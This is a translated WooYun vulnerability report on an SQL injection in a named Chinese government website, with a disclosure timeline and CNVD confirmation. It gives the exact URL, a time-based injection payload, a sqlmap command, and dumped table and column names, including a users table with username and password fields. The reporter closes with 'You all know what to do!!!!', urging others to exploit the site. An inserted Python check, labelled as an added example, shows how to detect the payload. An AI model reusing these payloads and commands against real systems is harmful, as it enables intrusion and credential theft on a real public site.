WooYun (WooYun.org) historical vulnerability search: http://wy.zone.ci/
WooYun Drops articles, online browsing: http://drop.zone.ci/
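2015-03-04: Details reported to the vendor; awaiting vendor handling
2015-03-09: Vendor confirmed; details disclosed only to the vendor
2015-03-19: Details disclosed to core white hats and experts in related fields
2015-03-29: Details disclosed to regular white hats
2015-04-08: Details disclosed to intern white hats
2015-04-18: Details disclosed to the public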
Injection
http://www.symzj.gov.cn/symz/wsdc.jsp
POST data: dc=3%3b%20waitfor%20delay%20%270%3a0%3a3.058%27%20--%20
sqlmap.py -u "http://www.symzj.gov.cn/symz/wsdc.jsp" --data "dc=3" --level 3 --dbs
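A defensive check for the request body shown above, as an added example that is not part of the original report: it decodes a form-encoded POST body, enforces that `dc` is a plain integer, and flags T-SQL time-delay and stacked-statement markers. Treating `dc` as an integer is an assumption based on the benign value `dc=3`; the function name, pattern list and sample bodies are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Parameters expected to be plain integers. "dc" is the field from the
# report; treating it as an integer is an assumption based on the benign
# value dc=3 that the page shows.
INTEGER_PARAMS = {"dc"}

# T-SQL markers of a time-based or stacked-statement probe (heuristics only).
SUSPICIOUS = [
    ("waitfor-delay", re.compile(r"\bwaitfor\s+delay\b", re.I)),
    ("stacked-statement", re.compile(r";\s*\w")),
    ("sql-comment", re.compile(r"--|/\*")),
]


def inspect_body(body):
    """Return a list of (param, reason) findings for one form-encoded body."""
    findings = []
    # parse_qsl percent-decodes names and values, so encoded input such as
    # %3b%20waitfor is matched in its decoded form.
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name in INTEGER_PARAMS and not re.fullmatch(r"\d{1,9}", value):
            findings.append((name, "not-an-integer"))
        for reason, pattern in SUSPICIOUS:
            if pattern.search(value):
                findings.append((name, reason))
    return findings


# Constructed sample bodies; the second is the request body quoted in the report.
SAMPLES = [
    "dc=3",
    "dc=3%3b%20waitfor%20delay%20%270%3a0%3a3.058%27%20--%20",
    "dc=3&note=a--b",
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(body, "->", inspect_body(body) or "clean")
```

The third sample shows why the strict type check on `dc` is the reliable control: keyword patterns also fire on harmless free text, so they belong in alerting rather than in request rejection.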
43
dbo.comd_list
dbo.dtest
dbo.dtproperties
dbo.fc_result
dbo.jc_download
dbo.jc_upload
dbo.jc_users
dbo.mj_2005_1a
dbo.mj_2005_1b
dbo.mj_2005_2a
dbo.mj_2005_2b
dbo.mj_2005_3a
dbo.mj_2005_3b
dbo.mj_2005_4a
dbo.mj_2005_4b
dbo.mj_2005_5a
dbo.mj_2005_5b
dbo.mj_2005_6a
dbo.mj_2005_7a
dbo.mj_2005_8a
Database: symz
Table: dbo.jc_users
[179 columns]
Database: symz
Table: dbo.jc_users
[9 columns]
+----------+---------+
| Column   | Type    |
+----------+---------+
| fzr_name | varchar |
| gl_id    | int     |
| id       | int     |
| level    | varchar |
| link     | varchar |
| name     | varchar |
| password | varchar |
| state    | varchar |
| username | varchar |
+----------+---------+
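You all know what to do!!!!
Severity: High
Vulnerability Rank: 11
Confirmation time: 2015-03-09 10:43
CNVD has confirmed the situation described and has passed it to CNCERT to be issued to the regional branch center, which will follow up and coordinate with the organization that manages the website to handle it.
None yet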